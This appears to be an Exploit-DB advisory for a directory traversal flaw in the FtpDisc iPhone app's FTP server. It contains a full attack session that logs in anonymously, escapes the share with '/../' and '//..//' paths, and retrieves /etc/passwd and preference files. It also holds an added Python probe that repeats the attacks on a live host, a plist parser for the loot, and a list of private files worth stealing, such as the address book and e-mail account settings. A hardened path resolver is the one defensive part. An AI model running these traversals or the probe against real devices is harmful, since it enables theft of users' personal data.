exploit-db-mirror/exploits/ios/remote/16208.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

# Exploit Title: FtpDisc v1.0 for iPhone / iPod touch, Directory Traversal
# Date: 02/22/2011
# Author: R3d@l3rt, Sp@2K, Sunlight
# Software Link: http://itunes.apple.com/kr/app/ftpdisc-lite-pdf-reader/id329157971?mt=8
# Version: 1.0
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is a directory traversal vulnerability in FtpDisc: its built-in
# Mocha FTP server (port 2121, anonymous login accepted) resolves paths that
# begin with "/" or "//" outside the app's shared folder, so a remote client
# can read any file the app itself can read. Note in the session below that
# the purely relative form "../../etc/passwd" is rejected with 550, while
# "/../../etc/passwd" and "//..//..//" are served.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 2121
Connected to 192.168.0.70.
220 Mocha FTP Server
User (192.168.0.70:(none)): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 documents
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 other
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 photos
drwxrwxrwx 1 nobody nobody 68 Jan 3 17:14 video
226 Transfer completed
ftp: 277 bytes received in 0.00Seconds 277000.00Kbytes/sec.
ftp> cd //..//..//..//..//..//..//
250 CWD command successful.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls
-r-xr-xr-x 1 nobody nobody 0 Aug 3 2010 12:41 .file
dr-xr-xr-x 1 nobody nobody 1428 Feb 8 12:50 Applications
dr-xr-xr-x 1 nobody nobody 68 Aug 19 2010 4:10 Developer
dr-xr-xr-x 1 nobody nobody 884 Jan 12 12:53 Library
dr-xr-xr-x 1 nobody nobody 102 Aug 19 2010 4:18 System
dr-xr-xr-x 1 nobody nobody 306 Feb 8 11:48 User
dr-xr-xr-x 1 nobody nobody 2074 Jan 13 9:52 bin
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 boot
-r-xr-xr-x 1 nobody nobody 638 Jan 25 15:30 control
dr-xr-xr-x 1 nobody nobody 68 Aug 3 2010 12:41 cores
1 nobody nobody 68 1 dev
dr-xr-xr-x 1 nobody nobody 918 Jan 26 11:34 etc
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 lib
dr-xr-xr-x 1 nobody nobody 68 Oct 26 2010 1:19 mnt
dr-xr-xr-x 1 nobody nobody 136 Oct 23 2010 15:12 private
dr-xr-xr-x 1 nobody nobody 1666 Jan 13 9:52 sbin
drwxrwxrwx 1 nobody nobody 272 Feb 22 16:02 tmp
dr-xr-xr-x 1 nobody nobody 374 Jan 13 9:52 usr
dr-xr-xr-x 1 nobody nobody 1088 Oct 26 2010 1:19 var
226 Transfer completed
ftp: 1461 bytes received in 0.02Seconds 91.31Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 PORT command successful.
550 cannot find the file
ftp> get /../../../../../../etc/passwd
200 PORT command successful.
150 Opening ASCII mode data connection for /../../../../../../etc/passwd
226 Transfer completed
ftp: 785 bytes received in 0.00Seconds 785000.00Kbytes/sec.
ftp> get //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
200 PORT command successful.
150 Opening ASCII mode data connection for //..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist
226 Transfer completed
ftp: 1239 bytes received in 0.00Seconds 1239000.00Kbytes/sec.
ftp> quit
221 Goodbye
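# Added example, not part of the original advisory and not FtpDisc's code: the
# three path forms tried in the session above are run through two resolvers,
# a hypothetical naive one that reproduces the 550 / served responses seen
# here, and a hardened one that confines every request to the share root. A
# small ftplib probe repeats the RETR attempts against a live server. Only the
# probe paths come from the page; SHARE_ROOT, the naive resolver's logic and
# the probe's login details are assumptions.

```python
import ftplib
import posixpath
import sys

# Hypothetical share root: the real FtpDisc sandbox path is not on the page.
SHARE_ROOT = "/private/var/mobile/Applications/APP-UUID/Documents"

# The three path forms tried in the session above, plus a legitimate request.
PROBE_PATHS = [
    "../../../../../../etc/passwd",                  # relative: answered 550
    "/../../../../../../etc/passwd",                 # leading slash: served
    "//..//..//..//..//..//..//private/var/mobile/Library/Preferences/com.apple.Maps.plist",
    "documents/report.pdf",                          # in-share, must keep working
]


def is_inside(root, path):
    """True if the normalized absolute `path` is `root` or lies beneath it."""
    root = root.rstrip("/") or "/"
    return path == root or path.startswith(root + "/")


def resolve_naive(root, client_path):
    """Hypothetical resolver that reproduces the responses in the transcript:
    '..' segments of a relative path are dropped before the lookup (so the
    relative request lands on a nonexistent file under the share and fails
    with 550), while a path starting with '/' is handed to the filesystem
    verbatim. This models the observed behaviour; it is not FtpDisc's code."""
    if client_path.startswith("/"):
        return "/" + posixpath.normpath(client_path).lstrip("/")
    parts = [p for p in client_path.split("/") if p not in ("", ".", "..")]
    return posixpath.join(root, *parts) if parts else root


def resolve_safe(root, client_path):
    """Hardened resolver: every client path is relative to the share root,
    leading slashes are stripped, the path is collapsed lexically, and the
    result is refused (None) unless it is still inside the root. This check
    is lexical only; apply os.path.realpath on the real filesystem afterwards
    if the share may contain symlinks."""
    if "\x00" in client_path:
        return None
    rel = posixpath.normpath(client_path.lstrip("/"))
    full = posixpath.normpath(posixpath.join(root, rel))
    return full if is_inside(root, full) else None


def probe_ftp(host, port=2121, user="anonymous", password="probe@example.com",
              paths=PROBE_PATHS):
    """Live check: log in anonymously and try to RETR each path form.
    Returns {path: bytes_received or error text}. Not run on import.
    ftplib defaults to passive mode; call ftp.set_pasv(False) first if the
    server only accepts PORT, which is what the Windows client above used."""
    results = {}
    with ftplib.FTP() as ftp:
        ftp.connect(host, port, timeout=10)
        ftp.login(user, password)
        for path in paths:
            buf = bytearray()
            try:
                ftp.retrbinary("RETR " + path, buf.extend)
                results[path] = len(buf)
            except ftplib.error_perm as exc:
                results[path] = str(exc)        # e.g. "550 cannot find the file"
    return results


if __name__ == "__main__":
    if len(sys.argv) > 1:                       # python3 probe.py 192.168.0.70
        for path, outcome in probe_ftp(sys.argv[1]).items():
            print(f"{outcome!s:>32}  {path}")
    else:
        for path in PROBE_PATHS:
            print(f"{path}\n  naive -> {resolve_naive(SHARE_ROOT, path)}"
                  f"\n  safe  -> {resolve_safe(SHARE_ROOT, path)}")
```

Run with no arguments to see how each path form resolves under the two
resolvers; pass a host to repeat the RETR attempts against a live server. The
hardened resolver treats "/", "//" and relative forms identically, which is
the property the naive one lacks.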
C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
C:\>type com.apple.Maps.plist
bplist00?

C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>
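# Added example, not part of the original advisory: the Preferences files
# pulled above are Apple binary plists (the "bplist00" magic is visible in the
# dumps), which is why `type` shows only fragments. The code below decodes a
# plist with plistlib and pulls out the IPv4.Router strings. The sample plist
# is constructed here; its key layout is an assumption modeled on the strings
# visible in the com.apple.conference.plist dump, not the real file.

```python
import plistlib


def load_plist(data):
    """Parse binary ("bplist00") or XML plist bytes into Python objects."""
    if data[:8] == b"bplist00":
        return plistlib.loads(data, fmt=plistlib.FMT_BINARY)
    return plistlib.loads(data)           # XML; plistlib sniffs the format


def find_strings(obj, needle):
    """Recursively collect every key or string value containing `needle`."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            if isinstance(key, str) and needle in key:
                hits.append(key)
            hits.extend(find_strings(value, needle))
    elif isinstance(obj, list):
        for value in obj:
            hits.extend(find_strings(value, needle))
    elif isinstance(obj, str) and needle in obj:
        hits.append(obj)
    return hits


def router_entries(plist):
    """Split 'IPv4.Router=...;IPv4.RouterHardwareAddress=...' strings into
    one dict per entry, e.g. {"IPv4.Router": "192.168.0.1", ...}."""
    entries = []
    for text in find_strings(plist, "IPv4.Router="):
        entries.append(dict(field.split("=", 1)
                            for field in text.split(";") if "=" in field))
    return entries


# Constructed sample (assumed layout) with the router strings from the dump.
SAMPLE_CONFERENCE = plistlib.dumps({
    "restoredFromBackup": False,
    "natTypeCache": {
        "IPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX": {"natFlag": 2},
        "IPv4.Router=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX": {"natFlag": 2},
    },
}, fmt=plistlib.FMT_BINARY)


if __name__ == "__main__":
    # Replace SAMPLE_CONFERENCE with open("com.apple.conference.plist", "rb").read()
    for entry in router_entries(load_plist(SAMPLE_CONFERENCE)):
        print(entry["IPv4.Router"], entry.get("IPv4.RouterHardwareAddress"))
```

On a Mac, `plutil -convert xml1 com.apple.conference.plist` performs the same
binary-to-XML conversion in place; the AddressBook file listed below is a
SQLite database, not a plist, and opens with the sqlite3 client.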
# iPhone inside information (files worth retrieving through the traversal)
1. Phone Book
- /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
2. Safari Favorites List
- /private/var/mobile/Library/Safari
3. User's E-mail Account Information
- /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist
4. IPv4 Router Information
- /private/var/mobile/Library/Preferences/com.apple.conference.plist